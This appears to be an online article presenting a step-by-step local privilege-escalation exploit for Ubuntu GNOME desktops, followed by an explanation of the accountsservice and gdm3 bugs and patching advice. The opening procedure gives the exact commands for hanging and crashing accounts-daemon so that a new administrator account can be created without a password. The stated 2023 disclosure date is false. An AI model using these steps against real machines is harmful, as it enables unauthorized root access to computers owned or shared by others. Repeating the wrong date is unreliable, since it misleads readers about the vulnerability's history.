Create a New sudo User and Gain Root on Ubuntu Without a Password – Full Exploit Guide

Exploit Procedure

Open a terminal and create a symbolic link named .pam_environment in the user’s home directory that points to /dev/zero: ln -s /dev/zero .pam_environment If the file already exists, rename it first to keep a backup.

Open Settings → Region & Language and attempt to change the language. The dialog will freeze because the accounts-daemon service enters an infinite loop.

While the dialog is frozen, return to the terminal and remove the symbolic link to avoid being locked out of the original account: rm .pam_environment Identify the PID of the stuck accounts-daemon process (it appears at the top of top or can be obtained with pidof): pidof accounts-daemon Example output: 597 Pause the daemon to prevent it from consuming CPU: kill -SIGSTOP 597 Set a timer that, after logout, will crash the daemon with SIGSEGV and then resume it with SIGCONT:

nohup bash -c "sleep 30s; kill -SIGSEGV 597; kill -SIGCONT 597" &

Log out of the current session. After a few seconds the exploit triggers a series of dialogs that launch gnome-initial-setup. Because the system believes no user accounts exist, the setup wizard forces the creation of a new user with administrator privileges, which can then execute sudo commands.

Vulnerability Mechanism

accounts-daemon bug : The Ubuntu‑modified accountservice daemon includes a function is_in_pam_environment that reads a file named .pam_environment from the user’s home directory. When this file is a symlink to /dev/zero, the daemon reads an infinite stream of zero bytes, never reaching EOF. The read loop consumes 100 % CPU and drops the daemon’s effective privileges, leaving it vulnerable to further manipulation.

gdm3 bug : The GNOME Display Manager ( gdm3) queries accounts-daemon to determine how many user accounts exist during the initial‑setup phase. Because the daemon is stuck (or crashes after receiving SIGSEGV), gdm3 times out and assumes zero users. It then launches gnome-initial-setup, which requires the creation of an administrator account. The attacker therefore gains a privileged account without providing a system password.

Mitigation

The vulnerabilities were reported on 17 October 2023. Updated packages for accountservice and gdm3 containing the necessary patches have been released in the latest Ubuntu repositories. Users should apply all security updates (e.g., sudo apt update && sudo apt upgrade) as soon as possible. The issue only affects Ubuntu desktop editions that use GNOME; command‑line‑only installations or non‑GNOME desktop environments are not impacted.

References:

GitHub Security Lab research page: https://securitylab.github.com/research/Ubuntu-gdm3-accountsservice-LPE

Discussion thread: https://news.ycombinator.com/item?id=25053238